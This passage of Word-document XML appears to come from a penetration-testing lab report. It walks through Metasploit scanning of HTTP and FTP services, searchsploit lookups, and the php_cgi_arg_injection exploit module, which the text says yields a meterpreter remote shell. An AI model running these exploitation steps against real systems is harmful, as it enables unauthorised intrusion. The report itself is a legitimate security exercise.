          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Step2: Use Auxilliary scanner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11424008"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&gt; use auxiliary/scanner/http/http_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359F3F09"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&gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394204BA"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&gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BC1FD9"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Step3: dir_listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301E9E3A" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="00B65A18">
      <w:pPr>
        <w:pStyle w:val="pw-post-body-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>‘dir_listing’ will determine if directory listing is enabled:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A8DB1B"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use auxiliary/scanner/http/dir_listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EA71F3"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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E225AA1"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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FBCD26" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="00B65A18">
      <w:pPr>
        <w:pStyle w:val="pw-post-body-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Step 4: these results might make a difference and we should take a look at them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F9EB9D"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use auxiliary/scanner/http/verb_auth_bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D0EACF"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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CCDBF2" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="00B65A18">
      <w:pPr>
        <w:pStyle w:val="lr"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>&gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351E971A"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Step5: Searching exploit DB for a the version of PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71977F28"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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>$ searchsploit apache | grep 5.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF62302"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t xml:space="preserve">Step6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>use exploit/multi/http/php_cgi_arg_injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9D8C6" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="00B65A18">
      <w:pPr>
        <w:pStyle w:val="lr"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&gt; set lhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C17B8" w14:textId="17028E64" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="00B65A18">
      <w:pPr>
        <w:pStyle w:val="lr"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>&gt;runThis gives us a meterpreter shell which can be used to run code remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6206CA87" w14:textId="048855BC" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="00B65A18">
      <w:pPr>
        <w:pStyle w:val="lr"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="558E0189" wp14:editId="444ACC31">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>594360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>651510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3589020" cy="3400425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="14802618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89020" cy="3400425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Port 22 Exploitation Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39949155"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13984020" w14:textId="05714915" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:pStyle w:val="lr"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43DDBB03" wp14:editId="7AFAE006">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>502920</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-335280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4030980" cy="3168015"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21431"/>
                <wp:lineTo x="21539" y="21431"/>
                <wp:lineTo x="21539" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="3641319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168015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E0C1B9"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1374B598"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7F674475"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37BA3E35" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:pStyle w:val="lr"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EF13AE9" w14:textId="4434374E" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="076DFDAD" w14:textId="5C39796A" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C5C3E8E" wp14:editId="3FC44643">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4711700" cy="596900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="4797517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1700" cy="596900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A9813C" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ECF94CA" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C8BF9D9" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FCEC66" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2205D48E" w14:textId="076C4549" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32B0CAEA" wp14:editId="11C9D7E6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="4248150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21503"/>
                <wp:lineTo x="21538" y="21503"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="20527900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48150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B81AB6" w14:textId="6775174D" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 80 Exploitation Results:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EAFF4AC" wp14:editId="212D71D7">
            <wp:extent cx="5712460" cy="5158740"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="12172674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2460" cy="5158740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F4A24DB" wp14:editId="0BAA2117">
            <wp:extent cx="5734685" cy="5034915"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1743132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685" cy="5034915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E58AC4" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3610"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42094217" w14:textId="2BB71265" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3610"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A74AC24" wp14:editId="4DAAC792">
            <wp:extent cx="5734685" cy="2720340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="5673462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2720340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="783951BB" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3610"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A0169EB" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3610"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3349474B" w14:textId="041AF981" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3610"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78FCBEF6" wp14:editId="340D7A56">
            <wp:extent cx="5723255" cy="2776855"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="2054585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p>
    <w:p w14:paraId="1D40E9CE" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E564A58" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Main Target Website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6EE8E3" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3642"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B65A18">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerable ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 21,110</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE91AEA" w14:textId="77777777" w:rsidR="003E376B" w:rsidRPr="00B65A18" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3642"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B65A18">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploitation Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BA63AB" w14:textId="77777777" w:rsidR="003E376B" w:rsidRPr="00B65A18" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B65A18">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PORT21:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8E56BB" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 1: Do an NMAP scan on port 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A24C4E"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db_nmap -p 21 &lt;ip address&gt; -A -sV -sC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A56164B" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:pStyle w:val="lq"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Step2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A1F970" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:pStyle w:val="pw-post-body-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>MSF also has an auxiliary module for ftp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB0E63"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use auxiliary/scanner/ftp/ftp_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F93B77E"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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F33A35" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0CF080" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step3:Using ExploitDB for vsftp version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717331E4" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>$ searchploit vsftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4DFE66" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> grep vsftp search exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A257196" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79835BEF" w14:textId="77777777" w:rsidR="003E376B" w:rsidRDefault="003E376B" w:rsidP="003E376B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
